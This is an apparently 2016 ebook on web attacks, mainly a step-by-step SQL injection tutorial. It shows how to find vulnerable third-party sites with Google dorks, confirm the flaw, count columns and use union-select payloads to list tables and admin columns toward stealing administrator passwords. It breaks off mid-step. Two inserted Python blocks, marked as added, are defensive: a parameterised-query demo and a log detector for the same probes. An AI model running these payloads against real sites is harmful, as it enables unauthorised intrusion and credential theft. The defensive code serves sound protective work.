Prajwal Naik - Website Attacks

Web ATTACKs

v1.0

- Prajwal Naik
Copyright 2016
ABOUT

The book looks at common web attacks, how their vulnerabilities are found, and how to protect against them. It is important for web developers and administrators to have a thorough knowledge of these attacks. New web-based attack types and vectors come out every day, and this is causing businesses, communities and individuals to take security more seriously than they ever have in the past. This is a huge win for the World Wide Web and a trend that is pushing technology further towards more robust and securely developed web applications. Considering the somewhat poor programming approach that leads to these attacks, some countermeasures are offered to help prevent future vulnerabilities and subsequent attacks.

* For educational purposes only.
Common Attacks Affecting Websites

1. SQL Injection
2. Cross-Site Scripting (XSS)
3. Inclusion Vulnerabilities: LFI and RFI
4. DoS
5. Broken Authentication and Session Management
6. Missing Function Level Access Control
7. Cross-Site Request Forgery

1. SQL Injection

Before starting with SQLi, we should know what SQL and a database are.

A database is a collection of data. On a website, the database is used for storing user IDs, passwords, web page details, etc.

SQL is the language used to communicate with the database.

Some basic SQL statements:

For creating data:

CREATE DATABASE is used to create a new, empty database.

DROP DATABASE is used to completely destroy an existing database.

USE is used to select a default database.

CREATE TABLE is used to create a new table, which is where your data is actually stored.

ALTER TABLE is used to modify an existing table's definition.

DROP TABLE is used to completely destroy an existing table.

For manipulating data:

SELECT is used when you want to read (or select) your data.

INSERT is used when you want to add (or insert) new data.

UPDATE is used when you want to change (or update) existing data.

DELETE is used when you want to remove (or delete) existing data.

REPLACE is used when you want to add or change (or replace) new or existing data.

* Here we make use of the data-manipulation statements.

What can an attacker do with SQLi?

An attacker can use SQL injection to bypass authentication.

An SQL injection vulnerability could allow the complete disclosure of data residing on a database server.

An attacker could use SQL injection to alter data stored in a database. Altering data affects data integrity and could cause repudiation issues, for instance voiding transactions, altering balances and other records.

An attacker could use an SQL injection vulnerability to delete data from a database. Even if an appropriate backup strategy is employed, deletion of data could affect an application's availability until the database is restored.

An attacker could use SQL injection as the initial vector in an attack on an internal network that sits behind a firewall.

In short, an attacker can:

1. Bypass logins
2. Access secret data
3. Modify the contents of the website
4. Shut down the MySQL server

1. Finding a Vulnerable Website

The best tool for finding SQL injection targets is Google. We can find vulnerable websites using a Google dork list; a Google dork is a search that uses Google's search operators to locate vulnerable websites. Here we are going to use the inurl: operator to find them.

Some Examples:

inurl:index.php?id=

inurl:gallery.php?id=

inurl:article.php?id=

inurl:pageid=

Copy one of the above commands and paste it into the Google search box.

Hit enter.

You will get a list of websites.

We have to visit the websites one by one to check for the vulnerability.

Eg: www.site.com/inurl:index.php?id=1

2. Checking the Vulnerability

Now check whether the website is vulnerable. To check, add a single quote (') at the end of the URL and hit enter.

Eg: www.site.com/inurl:index.php?id=1'

If the page does not change, shows "page not found", or shows some other page, then it is not vulnerable.

If it shows any error related to the SQL query, then it is vulnerable.

Ex: Warning: mysql_fetch_array() use right syntax near line 1.
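The check above works because the page pastes the id parameter straight into its SQL text and then echoes the database error to the visitor. As an added example (not code from the book), here is that pattern in Python with SQLite beside a hardened version that validates the type, binds the value as a parameter and never returns the error text; the articles table and function names are assumptions.

```python
import sqlite3

def setup_db():
    # Constructed sample data, not from the book: a tiny in-memory articles table
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO articles VALUES (?, ?)",
                     [(1, "Welcome"), (2, "News")])
    return conn

def fetch_title_vulnerable(conn, raw_id):
    # Vulnerable pattern: the raw id is pasted into the SQL text, and the
    # database error message is returned to the page. A quote appended to
    # the id (the "is it vulnerable?" check above) produces a visible SQL error.
    try:
        rows = conn.execute("SELECT title FROM articles WHERE id=" + raw_id).fetchall()
        return [r[0] for r in rows]
    except sqlite3.Error as e:
        return "Warning: " + str(e)   # leaks query details to the visitor

def fetch_title_safe(conn, raw_id):
    # Hardened pattern: validate the expected type, bind the value as a
    # parameter so it can never become SQL, and never echo database errors.
    try:
        article_id = int(raw_id)
    except ValueError:
        return []                     # "1'" or "1 order by 5--" is simply "not found"
    try:
        rows = conn.execute("SELECT title FROM articles WHERE id=?", (article_id,)).fetchall()
        return [r[0] for r in rows]
    except sqlite3.Error:
        return []                     # log server-side in a real app; show the user nothing

if __name__ == "__main__":
    db = setup_db()
    for probe in ("1", "1'", "1 order by 5--"):
        print(repr(probe), fetch_title_vulnerable(db, probe), fetch_title_safe(db, probe))
```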

3. Finding the Number of Columns

Now that we have found the website is vulnerable, the next step is to find the number of columns in the table.

For that, replace the single quote (') with an order by x-- statement.

Change x through 1, 2, 3, 4, 5, 6, ... until you get an error like "unknown column".

Eg: www.site.com/inurl:index.php?id=1 order by 1--

... order by 2--

... order by 3--

... order by 4--

www.site.com/inurl:index.php?id=1 order by 5--

If you get the error at 5, then the number of columns is x-1,

i.e. number of columns = 5-1 = 4.

4. Displaying the Vulnerable Columns

Using a union select query we will find the vulnerable part of the table, so replace the order by n with this statement. Change the id value to a negative number, i.e. index.php?id=-1. Add add 1=2 before union (1=2 is false). Replace the columns with the numbers from 1 to x-1 separated by commas. If the number of columns is 4, the query should be:

www.site.com/inurl:index.php?id=-1 add 1=2 union select 1,2,3,4--

Then the page will show one or more of the numbers less than or equal to x-1.

Let's assume the page shows 2.

Replace the number 2 with user() to display the database user.

Eg: www.site.com/inurl:index.php?id=-1 add 1=2 union select 1,user(),3,4--

5. Finding the Version

Replace the 2 with version().

www.site.com/inurl:index.php?id=-1 add 1=2 union select 1,version(),3,4--

It is important to check the version.

6. Finding the Table Name

As I said, finding the version is important: if the version is 4 or below, you have to guess the table name.

If you get version 5, then:

Replace the 2 with group_concat(table_name), and at the end, before --, add

from information_schema.tables where table_schema=database()

Eg: www.site.com/inurl:index.php?id=-1 add 1=2 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=database()--

Now you will get all the table names. As we don't need all the tables, select the tables related to admin or users.

So let's now select the admin table.

7. Finding the Column Name

Replace group_concat(table_name) with group_concat(column_name), as we now have to find the columns. And replace

from information_schema.tables where table_schema=database()-- with from information_schema.columns where table_name=mysqlchar--

Find MysqlChar() for the table name:

First of all, install the HackBar add-on in Mozilla Firefox.

Go to SQL - MySQL - MysqlChar().

A window will open; as we selected the admin table, write admin and click OK.

It will give some code in brackets.

Copy and paste it in the place of mysqlchar.

Eg: www.site.com/inurl:index.php?id=-1 add 1=2 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name=CHAR(10,18,50,72)--

Now it will show the list of columns.

Ex: admin,password,admin_id,admin_name,admin_password,active,id,admin_name,admin_pass,admin_id,admin_name,admin_password,ID_admin,admin_username,username,password, etc.

Replace group_concat(column_name) with group_concat(columnname,0x3a,another columnname).
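Every step of the walkthrough above leaves a distinctive footprint in the web server access log: a stray quote after a numeric id, order by N--, union select, version() or user(), group_concat and information_schema. As an added example (not from the book), this Python detector parses constructed Apache-style log lines and flags those patterns per request; the log format, rule names and sample requests are assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Constructed sample log lines (not real traffic), Apache-style, one request each
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2016:10:00:01 +0000] "GET /index.php?id=1 HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2016:10:00:07 +0000] "GET /index.php?id=1%27 HTTP/1.1" 500 88
10.0.0.9 - - [01/Jan/2016:10:00:12 +0000] "GET /index.php?id=1%20order%20by%205-- HTTP/1.1" 500 88
10.0.0.9 - - [01/Jan/2016:10:00:20 +0000] "GET /index.php?id=-1%20union%20select%201,version(),3,4-- HTTP/1.1" 200 600
10.0.0.9 - - [01/Jan/2016:10:00:31 +0000] "GET /index.php?id=-1+union+select+1,group_concat(table_name),3,4+from+information_schema.tables-- HTTP/1.1" 200 900
10.0.0.7 - - [01/Jan/2016:10:01:02 +0000] "GET /gallery.php?id=42 HTTP/1.1" 200 2048
"""

LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

# Each rule matches one probe style from the walkthrough; rules run on decoded parameter values
RULES = [
    ("quote_probe",    re.compile(r"^\d+'$")),                          # id=1'
    ("order_by_probe", re.compile(r"\border\s+by\s+\d+", re.I)),        # order by 5--
    ("union_select",   re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("schema_enum",    re.compile(r"information_schema\.|group_concat\(", re.I)),
    ("fingerprint",    re.compile(r"\b(version|user|database)\(\)", re.I)),
]

def scan_line(line):
    """Return {ip, status, hits} for a suspicious request, or None for a clean one."""
    m = LINE_RE.match(line)
    if not m:
        return None
    hits = set()
    for _name, value in parse_qsl(urlsplit(m["path"]).query, keep_blank_values=True):
        value = unquote_plus(value)   # second decode catches double-encoded probes such as %2527
        for rule, rx in RULES:
            if rx.search(value):
                hits.add(rule)
    return {"ip": m["ip"], "status": m["status"], "hits": sorted(hits)} if hits else None

def scan_log(text):
    # Keep only the lines that triggered at least one rule, in log order
    return [hit for hit in (scan_line(l) for l in text.splitlines()) if hit]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

A single client stepping through quote_probe, order_by_probe and then union_select within a minute is the sequence the walkthrough describes, and the 500 responses on the first probes show the application is also leaking error pages.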
